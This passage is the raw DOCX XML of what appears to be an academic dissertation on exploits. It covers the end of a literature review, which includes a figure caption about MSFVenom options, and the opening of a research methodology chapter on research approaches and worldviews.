                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5812140" cy="4202307"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="471007E6" w14:textId="5A3299B3" w:rsidR="00D67E61" w:rsidRDefault="00D67E61" w:rsidP="00C75431">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc111363602"/>
      <w:bookmarkStart w:id="143" w:name="_Toc111363739"/>
      <w:bookmarkStart w:id="144" w:name="_Toc111981763"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: MSFVenom options</w:t>
      </w:r>
      <w:r w:rsidR="00C22827">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1535270317"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[49]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="3FAE9669" w14:textId="77777777" w:rsidR="007979E4" w:rsidRPr="007979E4" w:rsidRDefault="007979E4" w:rsidP="007979E4"/>
    <w:p w14:paraId="0E977B30" w14:textId="50CE8E56" w:rsidR="00F32999" w:rsidRDefault="00F32999" w:rsidP="006D51EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc104297723"/>
      <w:bookmarkStart w:id="146" w:name="_Toc113190715"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D51EA">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Literature Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="5C9DC261" w14:textId="5C7CC617" w:rsidR="00F32999" w:rsidRDefault="00F32999" w:rsidP="00F32999">
      <w:r>
        <w:t xml:space="preserve">The literature review </w:t>
      </w:r>
      <w:r w:rsidR="00726AC9">
        <w:t>highlighted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the work in this field conducted by experts and what is currently known about various </w:t>
      </w:r>
      <w:r w:rsidR="007E09EB">
        <w:t>exploits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, how they work and what makes them </w:t>
      </w:r>
      <w:r w:rsidR="00726AC9">
        <w:t>successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041B1F7" w14:textId="74064D0A" w:rsidR="00F32999" w:rsidRPr="00F32999" w:rsidRDefault="00F32999" w:rsidP="00F32999">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00726AC9">
        <w:t>ensuing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chapter </w:t>
      </w:r>
      <w:r w:rsidR="00726AC9">
        <w:t>relates to how research is conducted, the different approaches and methodologies that are vital to making informed decisions on how to conduct research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4A176" w14:textId="4B3014B7" w:rsidR="00A03248" w:rsidRDefault="00A03248" w:rsidP="00F32999">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74712A12" w14:textId="07C0BAA3" w:rsidR="00DF42B8" w:rsidRPr="0060608D" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc113190716"/>
      <w:r w:rsidRPr="0060608D">
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 3: RESEARCH METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="3467EB74" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc104297047"/>
      <w:bookmarkStart w:id="149" w:name="_Toc104297724"/>
      <w:bookmarkStart w:id="150" w:name="_Toc113190717"/>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Introduction: Research Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="11C07ECF" w14:textId="46CA2B6F" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter three looks at the selection of a research approach, design, or strategies of inquiry </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="742449563"/>
          <w:placeholder>
            <w:docPart w:val="B02B0417302F46CF840AA81FCE2E1164"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. The quantitative, qualitative, and mixed method approaches will be considered and the most appropriate one will be selected. How the choice of this approach will influence the philosophical stance and the research methods overall will be examined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CD917C" w14:textId="32E41E71" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time horizons will be explored, and a </w:t>
      </w:r>
      <w:r w:rsidR="00A5686D">
        <w:t>project planner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> created to assist with the timekeeping objectives.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09530410" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ethical issues will be investigated, and risks and the mitigation thereof will be analysed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF8E43" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc104297048"/>
      <w:bookmarkStart w:id="152" w:name="_Toc104297725"/>
      <w:bookmarkStart w:id="153" w:name="_Toc113190718"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Research Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="45917FE0" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="009B2EFD" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The steps taken for the collection of data, its analysis and interpretation require plans and procedures and decisions need to be made as to the best way of approaching the research. As the deductive approach investigates methods to test the validity of a pre-existing theory, this will be used for this project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E37E8D" w14:textId="2785BF2C" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="5CCE0127">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="822418451"/>
          <w:placeholder>
            <w:docPart w:val="D2A63D841D5A4D2EB247EF9EB874CDC3"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="5CCE0127">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">here are three approaches: qualitative, quantitative, and mixed methods. Qualitative methodologies are </w:t>
      </w:r>
      <w:bookmarkStart w:id="154" w:name="_Int_xNK7iph8"/>
      <w:r>
        <w:t>generally used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
      <w:r>
        <w:t xml:space="preserve"> for research to explore social or human problems or studies on behaviour. Quantitative methods are used to gather empirical data by testing variables and mixed methods is where a mixture of qualitative and quantitative results is generated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277AE0AF" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>As this project will be an experiment where variables will be tested and empirical data collected, the quantitative method will be best suited for this task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300A5DFC" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc104297049"/>
      <w:bookmarkStart w:id="156" w:name="_Toc104297726"/>
      <w:bookmarkStart w:id="157" w:name="_Toc113190719"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Research Paradigm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="18C4602B" w14:textId="758EDC47" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The interconnection of worldviews that is required for the design of a framework for research is illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00475C95">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA205F" w14:textId="4937BBA8" w:rsidR="00DF42B8" w:rsidRDefault="0021473A" w:rsidP="0021473A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0021473A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A26FF75" wp14:editId="4596EE37">
            <wp:extent cx="5872930" cy="3387292"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="22860"/>
            <wp:docPr id="20" name="Picture 20"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10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5879558" cy="3391115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="002060"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8B2AE" w14:textId="415BD626" w:rsidR="00DF42B8" w:rsidRPr="00304586" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc111363603"/>
      <w:bookmarkStart w:id="159" w:name="_Toc111363740"/>
      <w:bookmarkStart w:id="160" w:name="_Toc111981764"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: The interconnection of worldviews, design, and research methods </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1980990125"/>
          <w:placeholder>
            <w:docPart w:val="B02B0417302F46CF840AA81FCE2E1164"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="158"/>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="37DB92B4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D97E6E4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The overview of the research plan involves the philosophical worldview and the various assumptions that are brought to the study and then how this interacts with the procedures of research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781C16C" w14:textId="281A137B" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="642772766"/>
          <w:placeholder>
            <w:docPart w:val="48F06C37D8854FEB813217324E35AF3E"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> there are four worldviews </w:t>
      </w:r>
      <w:r w:rsidRPr="00730DDA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“a basic set of beliefs that guid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00730DDA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> action”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E62B2B" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F438D72" wp14:editId="69FB9107">
            <wp:extent cx="4898924" cy="2740289"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="18" name="Picture 18" descr="Gedu 6170 Mixed Methods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edu 6170 Mixed Methods Research"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId56">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="12651" t="34079" r="7423" b="6368"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4930250" cy="2757812"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412EFC8" w14:textId="315809F2" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc111363604"/>
      <w:bookmarkStart w:id="162" w:name="_Toc111363741"/>
      <w:bookmarkStart w:id="163" w:name="_Toc111981765"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Four Worldviews </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="154505105"/>
          <w:placeholder>
            <w:docPart w:val="DD64B62FC8A3449DBC54D5F97F94B8F7"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="5585995B" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01591FC3" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00D801FF" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc104297050"/>
      <w:bookmarkStart w:id="165" w:name="_Toc104297727"/>
      <w:bookmarkStart w:id="166" w:name="_Toc113190720"/>
      <w:r w:rsidRPr="00D801FF">
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D801FF">
        <w:t xml:space="preserve">Postpositivist </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED48E3">
        <w:t>Worldview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="53243E4D" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>The assumptions associated with postpositivist worldviews are most associated with quantitative research. This philosophy suggests that causes determine outcomes or effects. Therefore, researchers using this methodology must identify and assess those causes which determine outcomes. These causes become variables in experiments and postpositivists observe and measure the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076EE3C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc104297051"/>
      <w:bookmarkStart w:id="168" w:name="_Toc104297728"/>
      <w:bookmarkStart w:id="169" w:name="_Toc113190721"/>
      <w:r>
        <w:t>3.3.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Constructivist Worldview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="5D9E4611" w14:textId="360D33A8" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Constructivist views research from a different point of view and attempt to understand the world and look at different viewpoints of participant studies. The participants are given open questions and their subjective replies are used to study how people interact with each other within society. The constructivist worldview can also be used to understand cultural or historical experiences </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1630317758"/>
          <w:placeholder>
            <w:docPart w:val="7062C0D66EAB4637A9228847C47DC609"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2E4F3" w14:textId="6AD7358F" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc104297052"/>
      <w:bookmarkStart w:id="171" w:name="_Toc104297729"/>
      <w:bookmarkStart w:id="172" w:name="_Toc113190722"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.3.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The Transformative Worldview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
      <w:bookmarkEnd w:id="171"/>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="504611E6" w14:textId="73A3B47C" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The transformative worldview is expressed via the researcher’s question to change the current political agenda and by doing so confront social oppression wherever it is found. It could also focus on disenfranchised or marginalised individuals or groups to improve their situation </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1136521234"/>
          <w:placeholder>
            <w:docPart w:val="AB865B082A684B71B56E518D83400D43"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[52]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29734E" w14:textId="3270639C" w:rsidR="00DF42B8" w:rsidRPr="0060608D" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc104297053"/>
      <w:bookmarkStart w:id="174" w:name="_Toc104297730"/>
      <w:bookmarkStart w:id="175" w:name="_Toc113190723"/>
      <w:r w:rsidRPr="0060608D">
        <w:t>3.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="0060608D">
        <w:tab/>
        <w:t>The Pragmatic Worldview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="70394D80" w14:textId="2445FF80" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="008D0D24">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This worldview is </w:t>
      </w:r>
      <w:bookmarkStart w:id="176" w:name="_Int_6wyAVesT"/>
      <w:r>
        <w:t>associated</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
      <w:r>
        <w:t xml:space="preserve"> with mixed method research that arises out of situations, actions, and consequences. Pragmatic worldviews research the problem with the intended consequence in mind and then chose the how and what to research to achieve that aim </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1511215483"/>
          <w:placeholder>
            <w:docPart w:val="BF89F913C6E64BD2BCE84E30B2F33962"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
